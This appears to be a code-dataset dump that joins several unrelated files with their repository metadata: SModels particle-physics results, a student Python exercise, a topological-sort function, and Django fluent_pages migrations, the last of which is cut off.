0.18762627815864522, 'AnalysisID': 'ATLAS-CONF-2013-024', 'upper limit (fb)': 0.19, 'theory prediction (fb)': 0.0007758367207617888, 'lumi (fb-1)': 20.5, 'TxNames': ['T2tt'], 'DataSetID': 'SR3: MET > 350'}, {'AnalysisSqrts (TeV)': 8, 'chi2': 0.09139882929374292, 'dataType': 'efficiencyMap', 'Mass (GeV)': None, 'maxcond': 0.0, 'expected upper limit (fb)': 0.463, 'likelihood': 0.091787344807384222, 'AnalysisID': 'ATLAS-CONF-2013-054', 'upper limit (fb)': 0.5, 'theory prediction (fb)': 0.0013047848687137208, 'lumi (fb-1)': 20.3, 'TxNames': ['T2', 'T2tt'], 'DataSetID': '7j80 flavor 0 b-jets'}, {'AnalysisSqrts (TeV)': 13, 'chi2': 0.035181360747816408, 'dataType': 'efficiencyMap', 'Mass (GeV)': None, 'maxcond': 0.0, 'expected upper limit (fb)': 1.26, 'likelihood': 0.34814937255663714, 'AnalysisID': 'ATLAS-SUSY-2015-02', 'upper limit (fb)': 1.26, 'theory prediction (fb)': 0.012020001372145027, 'lumi (fb-1)': 3.2, 'TxNames': ['T2tt'], 'DataSetID': 'SR2'}, {'AnalysisSqrts (TeV)': 8, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-PAS-SUS-13-023', 'upper limit (fb)': 4.488370799999999, 'theory prediction (fb)': 0.034444562449142735, 'lumi (fb-1)': 18.9, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-13-004', 'upper limit (fb)': 6.707422400000001, 'theory prediction (fb)': 0.034444562449142735, 'lumi (fb-1)': 19.3, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-13-019', 'upper limit (fb)': 28.95454, 'theory prediction (fb)': 0.034444562449142735, 'lumi (fb-1)': 19.5, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8, 'chi2': 2.0775669740848599, 'dataType': 'efficiencyMap', 'Mass (GeV)': [[435.0, 321.4], [435.0, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': 0.8395, 'likelihood': 0.018118314232756384, 'AnalysisID': 'ATLAS-SUSY-2014-03', 'upper limit (fb)': 0.5018, 'theory prediction (fb)': 0.0425236728155903, 'lumi (fb-1)': 20.3, 'TxNames': ['TScharm'], 'DataSetID': 'mCT150'}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 340.04999999999995], [808.3, 340.04999999999995]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'ATLAS-SUSY-2015-02', 'upper limit (fb)': 103.54699999999993, 'theory prediction (fb)': 0.2796967836994387, 'lumi (fb-1)': 3.2, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'ATLAS-SUSY-2015-02', 'upper limit (fb)': 77.06399999999996, 'theory prediction (fb)': 0.3496303949578995, 'lumi (fb-1)': 3.2, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-033', 'upper limit (fb)': 16.03673333333333, 'theory prediction (fb)': 0.3496303949578995, 'lumi (fb-1)': 35.9, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-036', 'upper limit (fb)': 9.556988800000001, 'theory prediction (fb)': 0.3496303949578995, 'lumi (fb-1)': 35.9, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-049', 'upper limit (fb)': 13.280713076923078, 'theory prediction (fb)': 0.3496303949578995, 'lumi (fb-1)': 35.9, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13.0, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-050', 'upper limit (fb)': 14.412808000000002, 'theory prediction (fb)': 0.3496303949578995, 'lumi (fb-1)': 35.9, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-051', 'upper limit (fb)': 10.6244916, 'theory prediction (fb)': 0.3496303949578995, 'lumi (fb-1)': 35.9, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-17-001', 'upper limit (fb)': 35.44316, 'theory prediction (fb)': 0.3496303949578995, 'lumi (fb-1)': 35.9, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8.0, 'chi2': 0.0046844499378386195, 'dataType': 'efficiencyMap', 'Mass (GeV)': None, 'maxcond': 0.0, 'expected upper limit (fb)': 0.743, 'likelihood': 0.050115430028928237, 'AnalysisID': 'CMS-SUS-13-012', 'upper limit (fb)': 1.21, 'theory prediction (fb)': 0.5057031943004956, 'lumi (fb-1)': 19.5, 'TxNames': ['T2', 'T2tt', 'T6bbWWoff'], 'DataSetID': '3NJet6_1000HT1250_600MHTinf'}, {'AnalysisSqrts (TeV)': 8.0, 'dataType': 'upperLimit', 'Mass (GeV)': [[1233.6, 321.4], [1233.6, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'ATLAS-SUSY-2013-02', 'upper limit (fb)': 4.1627674417777785, 'theory prediction (fb)': 0.5683519371938481, 'lumi (fb-1)': 20.3, 'TxNames': ['T2'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8, 'chi2': 0.047123556716875459, 'dataType': 'efficiencyMap', 'Mass (GeV)': None, 'maxcond': 0.0, 'expected upper limit (fb)': 2.1, 'likelihood': 0.018033175934649193, 'AnalysisID': 'ATLAS-CONF-2013-047', 'upper limit (fb)': 2.52, 'theory prediction (fb)': 0.8775048582679014, 'lumi (fb-1)': 20.3, 'TxNames': ['T1', 'T1bbqq', 'T2', 'T2tt'], 'DataSetID': 'A Medium'}, {'AnalysisSqrts (TeV)': 8.0, 'chi2': 2.3816461538326896, 'dataType': 'efficiencyMap', 'Mass (GeV)': None, 'maxcond': 0.0, 'expected upper limit (fb)': 1.5124, 'likelihood': 0.0078918609084519288, 'AnalysisID': 'ATLAS-SUSY-2013-02', 'upper limit (fb)': 1.8181, 'theory prediction (fb)': 1.6613836669444895, 'lumi (fb-1)': 20.3, 'TxNames': ['T1', 'T2'], 'DataSetID': 'SR2jt'}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[1233.6, 321.4], [1233.6, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-033', 'upper limit (fb)': 6.181469576852964, 'theory prediction (fb)': 4.941443621858816, 'lumi (fb-1)': 35.9, 'TxNames': ['T2'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[1233.6, 321.4], [1233.6, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-036', 'upper limit (fb)': 4.1513288, 'theory prediction (fb)': 4.941443621858816, 'lumi (fb-1)': 35.9, 'TxNames': ['T2'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8.0, 'dataType': 'upperLimit', 'Mass (GeV)': [[356.00988231550116, 321.4], [357.072205314013, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'ATLAS-SUSY-2013-02', 'upper limit (fb)': 5701.500237088296, 'theory prediction (fb)': 7.728246211660869, 'lumi (fb-1)': 20.3, 'TxNames': ['T1'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8.0, 'dataType': 'upperLimit', 'Mass (GeV)': [[438.1951789713725, 321.4], [438.3774682703211, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'ATLAS-SUSY-2013-02', 'upper limit (fb)': 967.6734743323401, 'theory prediction (fb)': 871.0003509943216, 'lumi (fb-1)': 20.3, 'TxNames': ['T2'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8.0, 'dataType': 'upperLimit', 'Mass (GeV)': [[438.12625289533446, 321.4], [438.642216742945, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-13-012', 'upper limit (fb)': 1466.966818632756, 'theory prediction (fb)': 935.8148705756644, 'lumi (fb-1)': 19.5, 'TxNames': ['T2'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8, 'dataType': 'upperLimit', 'Mass (GeV)': [[437.5209910776753, 321.4], [439.33102549677807, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-13-019', 'upper limit (fb)': 1061.9665100007187, 'theory prediction (fb)': 1160.4935751426733, 'lumi (fb-1)': 19.5, 'TxNames': ['T2'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[438.3496031120908, 321.4], [438.757496342467, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-033', 'upper limit (fb)': 399.35386729516733, 'theory prediction (fb)': 4591.861877556004, 'lumi (fb-1)': 35.9, 'TxNames': ['T2'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[438.3496031120908, 321.4], [438.757496342467, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-036', 'upper limit (fb)': 514.2516169165423, 'theory prediction (fb)': 4591.861877556004, 'lumi (fb-1)': 35.9, 'TxNames': ['T2'], 'DataSetID': None}], 'OutputStatus': {'minmassgap': 5.0, 'input file': '../data/Bino_excluded_slha/100488230.slha', 'decomposition status': 1, 'warnings': 'Input file ok', 'ncpus': -1, 'maxcond': 0.2, 'smodels version': '1.1.1.post3', 'database version': '1.1.2', 'sigmacut': 0.03, 'file status': 1}, 'Long Cascades': [{'weight (fb)': 636.8858663515357, 'sqrts (TeV)': 13.0, 'mother PIDs': [[2000001, 2000001], [2000001, 2000003], [2000003, 2000003]]}, {'weight (fb)': 546.6288974698384, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000002, 1000002], [1000002, 1000004]]}, {'weight (fb)': 394.6239937857626, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000002, 1000004], [1000004, 1000004]]}, {'weight (fb)': 391.487766702734, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000001, 1000001], [1000001, 1000003], [1000003, 1000003]]}, {'weight (fb)': 299.66172224145225, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000001, 1000002], [1000002, 1000003]]}, {'weight (fb)': 131.62539640945383, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000002, 2000001], [1000002, 2000003]]}, {'weight (fb)': 73.16356174908559, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000001, 2000001], [1000001, 2000003], [1000003, 2000001], [1000003, 2000003]]}, {'weight (fb)': 30.624523126002337, 'sqrts (TeV)': 13.0, 'mother PIDs': [[2000001, 2000002], [2000002, 2000003]]}, {'weight (fb)': 13.94121696982233, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000001, 1000004], [1000003, 1000004]]}, {'weight (fb)': 13.793056107933312, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000002, 2000002]]}], 'Missed Topologies': [{'weight (fb)': 1040.8566993139923, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[jet,jet],[jet,jet]]]'}, {'weight (fb)': 540.876223519754, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[jet,jet]]]'}, {'weight (fb)': 298.78807678620154, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[jet,jet],[l,nu]]]'}, {'weight (fb)': 298.2006301817304, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[l,nu],[jet,jet]]]'}, {'weight (fb)': 147.30767131214859, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[jet,jet],[nu,ta]]]'}, {'weight (fb)': 145.60259457504057, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[nu,ta],[jet,jet]]]'}, {'weight (fb)': 139.21146559705483, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[l,nu]]]'}, {'weight (fb)': 96.36675859548866, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[l,nu],[l,nu]]]'}, {'weight (fb)': 86.6200993215025, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[photon]]]'}, {'weight (fb)': 68.68906468596393, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[nu,ta]]]'}], 'Asymmetric Branches': [{'weight (fb)': 532.9335789742406, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000002, 1000002], [1000002, 1000004], [1000004, 1000004]]}, {'weight (fb)': 172.3783326016151, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000001, 1000002], [1000001, 1000004], [1000002, 1000003], [1000003, 1000004]]}, {'weight (fb)': 90.56041427502541, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000001, 1000001], [1000001, 1000003], [1000003, 1000003]]}, {'weight (fb)': 64.90475182488875, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000002, 2000001], [1000002, 2000003], [1000004, 2000001], [1000004, 2000003]]}, {'weight (fb)': 50.11555613127241, 'sqrts (TeV)': 13.0, 'mother PIDs': [[2000001, 2000001], [2000001, 2000003], [2000003, 2000003]]}, {'weight (fb)': 18.454477729999994, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000022, 1000024]]}, {'weight (fb)': 17.826953089865842, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000023, 1000024]]}, {'weight (fb)': 12.383551689803406, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000022, 1000023]]}, {'weight (fb)': 11.485848817914249, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000022, 2000001], [1000022, 2000003]]}, {'weight (fb)': 10.472686420984749, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000024, 1000024]]}], 'Outside Grid': [{'weight (fb)': 88.48133368234193, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet]]]'}, {'weight (fb)': 1.8492721985478566, 'sqrts (TeV)': 13.0, 'element': '[[[b],[jet,jet]],[[b],[l,nu]]]'}, {'weight (fb)': 1.028127629776797, 'sqrts (TeV)': 13.0, 'element': '[[[l,nu]],[[l,nu]]]'}, {'weight (fb)': 0.9124591650782516, 'sqrts (TeV)': 13.0, 'element': '[[[b],[jet,jet]],[[b],[nu,ta]]]'}, {'weight (fb)': 0.7673101098593308, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet,jet]]]'}, {'weight (fb)': 0.5315720611960791, 'sqrts (TeV)': 13.0, 'element': '[[[l,l]],[[l,nu]]]'}, {'weight (fb)': 0.30837059437025616, 'sqrts (TeV)': 13.0, 'element': '[[[b],[l,nu]],[[b],[l,nu]]]'}, {'weight (fb)': 0.3043095281427132, 'sqrts (TeV)': 13.0, 'element': '[[[b],[l,nu]],[[b],[nu,ta]]]'}, {'weight (fb)': 0.20401965403968503, 'sqrts (TeV)': 13.0, 'element': '[[[jet],[photon]],[[jet],[photon]]]'}, {'weight (fb)': 0.07507548596482914, 'sqrts (TeV)': 13.0, 'element': '[[[b],[nu,ta]],[[b],[nu,ta]]]'}]} | [
"[email protected]"
] | |
6c2cf63addd9d3664eeabb0d446ac9beeed5c449 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_287/ch16_2020_03_21_00_14_52_868139.py | 94be6d91f54a3fead1d374afc0cf87ba1bac9fca | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | f=float(input('conta:'))
f=f*1,1
print('Valor da conta com 10%:R$ {0:.2f}'.format(f))
| [
"[email protected]"
] | |
ee3473b10902f6c6c697639c370c76082fa54da6 | 06919b9fd117fce042375fbd51d7de6bb9ae14fc | /py/dcp/problems/graph/find_order.py | 65b844789e326bb2a11db792095d06afc91af167 | [
"MIT"
] | permissive | bmoretz/Daily-Coding-Problem | 0caf2465579e81996869ee3d2c13c9ad5f87aa8f | f79e062e9f6e7b18b7e95c071fbe71ad104affcb | refs/heads/master | 2022-12-07T15:41:06.498049 | 2021-11-18T19:45:19 | 2021-11-18T19:45:19 | 226,376,236 | 1 | 0 | MIT | 2022-11-22T09:20:23 | 2019-12-06T17:17:00 | C++ | UTF-8 | Python | false | false | 1,593 | py | '''Topological sort.
We are given a hasmap associating each courseId key with a list of courseIds values, which tells us that the prerequisites of courseId
are course Ids. Return a sorted ordering of courses such that we can complete the curriculum.
Return null if there is no such ordering.
For example, given the following prerequisites:
{
'CSC300' : ['CSC100', 'CSC200'],
'CSC200' : ['CSC100'],
'CSC100' : []
}
You should return ['CSC100', 'CSC200', 'CSC300'].
'''
from collections import deque, defaultdict
def find_order1(courses_to_prereqs : dict):
# Copy list values into a set for faster removal
course_to_prereqs = {c : set(p) for c, p in courses_to_prereqs.items()}
# Start off our list with all courses without prerequisites.
todo = deque([c for c, p in course_to_prereqs.items() if not p])
# Create a new data structure to map prereqs to successor courses.
prereq_to_courses = defaultdict(list)
for course, prereqs in course_to_prereqs.items():
for prereq in prereqs:
prereq_to_courses[prereq].append(course)
result = []
while todo:
prereq = todo.popleft()
result.append(prereq)
# Remove this prereq from all successor courses.
# If any course now does not have any prereqs, add it to todo.
for c in prereq_to_courses[prereq]:
course_to_prereqs[c].remove(prereq)
if not course_to_prereqs[c]:
todo.append(c)
# Circular dependency
if len(result) < len(course_to_prereqs):
return None
return result | [
"[email protected]"
] | |
f7383bb07b5a685e539266485c37b94cae869f20 | 992b6058a66a6d7e05e21f620f356d1ebe347472 | /fluent_pages/migrations/0001_initial.py | bebe90e32b27fb10654917cc68d5847990affc35 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] | permissive | masschallenge/django-fluent-pages | 5ffb47a6dc4d7333ccbef9973cea4e6cf79569fe | 8beb083d89fba935ef3bfeda8cacf566f28b1334 | refs/heads/master | 2021-07-15T14:27:46.078658 | 2015-11-12T16:52:00 | 2015-11-12T16:52:00 | 28,341,345 | 0 | 0 | NOASSERTION | 2021-03-24T18:53:09 | 2014-12-22T14:17:52 | Python | UTF-8 | Python | false | false | 9,911 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'UrlNode'
db.create_table('fluent_pages_urlnode', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('polymorphic_ctype', self.gf('django.db.models.fields.related.ForeignKey')(related_name='polymorphic_fluent_pages.urlnode_set', null=True, to=orm['contenttypes.ContentType'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=255)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=50, db_index=True)),
('parent', self.gf('mptt.fields.TreeForeignKey')(blank=True, related_name='children', null=True, to=orm['fluent_pages.UrlNode'])),
('parent_site', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sites.Site'])),
('status', self.gf('django.db.models.fields.CharField')(default='d', max_length=1)),
('publication_date', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('expire_date', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('in_navigation', self.gf('django.db.models.fields.BooleanField')(default=True)),
('sort_order', self.gf('django.db.models.fields.IntegerField')(default=1)),
('override_url', self.gf('django.db.models.fields.CharField')(max_length=300, blank=True)),
('author', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('creation_date', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('modification_date', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('_cached_url', self.gf('django.db.models.fields.CharField')(default='', max_length=300, db_index=True, blank=True)),
('lft', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
('rght', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
('tree_id', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
('level', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
))
db.send_create_signal('fluent_pages', ['UrlNode'])
# Adding model 'PageLayout'
db.create_table('fluent_pages_pagelayout', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('key', self.gf('django.db.models.fields.SlugField')(max_length=50, db_index=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=255)),
('template_path', self.gf('fluent_pages.models.fields.TemplateFilePathField')(path='/srv/www/webapps/edoburu.nl/edoburu_site/themes/edoburu/templates/', max_length=100, recursive=True, match='.*\\.html$')),
))
db.send_create_signal('fluent_pages', ['PageLayout'])
def backwards(self, orm):
# Deleting model 'UrlNode'
db.delete_table('fluent_pages_urlnode')
# Deleting model 'PageLayout'
db.delete_table('fluent_pages_pagelayout')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'fluent_pages.pagelayout': {
'Meta': {'ordering': "('title',)", 'object_name': 'PageLayout'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'template_path': ('fluent_pages.models.fields.TemplateFilePathField', [], {'path': "'/srv/www/webapps/edoburu.nl/edoburu_site/themes/edoburu/templates/'", 'max_length': '100', 'recursive': 'True', 'match': "'.*\\\\.html$'"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'fluent_pages.urlnode': {
'Meta': {'ordering': "('lft', 'sort_order', 'title')", 'object_name': 'UrlNode'},
'_cached_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '300', 'db_index': 'True', 'blank': 'True'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'expire_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_navigation': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'modification_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'override_url': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['fluent_pages.UrlNode']"}),
'parent_site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polymorphic_fluent_pages.urlnode_set'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'publication_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'sort_order': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'d'", 'max_length': '1'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['fluent_pages']
| [
"[email protected]"
] | |
b0ee96afdbb8d940aeeedbe2f8276662709cd207 | 09cead98874a64d55b9e5c84b369d3523c890442 | /py200913b_python2m8/day06_201018/filedir_4_remove.py | 0740189b7058ab68253a539e1376c26eddba0f08 | [] | no_license | edu-athensoft/stem1401python_student | f12b404d749286036a090e941c0268381ce558f8 | baad017d4cef2994855b008a756758d7b5e119ec | refs/heads/master | 2021-08-29T15:01:45.875136 | 2021-08-24T23:03:51 | 2021-08-24T23:03:51 | 210,029,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | """
remove dir or file
remove(name)
"""
import os
# os.remove("mydir3a")
# remove a file
os.remove("rename_file_new.py")
| [
"[email protected]"
] | |
9e673189f7b3663b9f3c1004c0d52e8ed3aec3bb | 871c8b48a58b3e7dc7821e14bc451acb92dfe33e | /cms/migrations/0009_auto_20160308_1456.py | e5cf4eb94dfd3f19f01071c28af85f5df2715bea | [
"BSD-3-Clause"
] | permissive | sonsandco/djangocms2000 | 6f3937e2185707c32f15e5e42d06e138751d85e4 | 25131e9e8659a7a30a8fd58b7da011cbb928c8ac | refs/heads/master | 2022-08-25T22:18:17.173639 | 2022-08-17T11:36:36 | 2022-08-17T11:36:36 | 121,998,739 | 0 | 0 | NOASSERTION | 2022-07-24T05:16:48 | 2018-02-18T23:00:47 | Python | UTF-8 | Python | false | false | 1,935 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-03-08 01:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
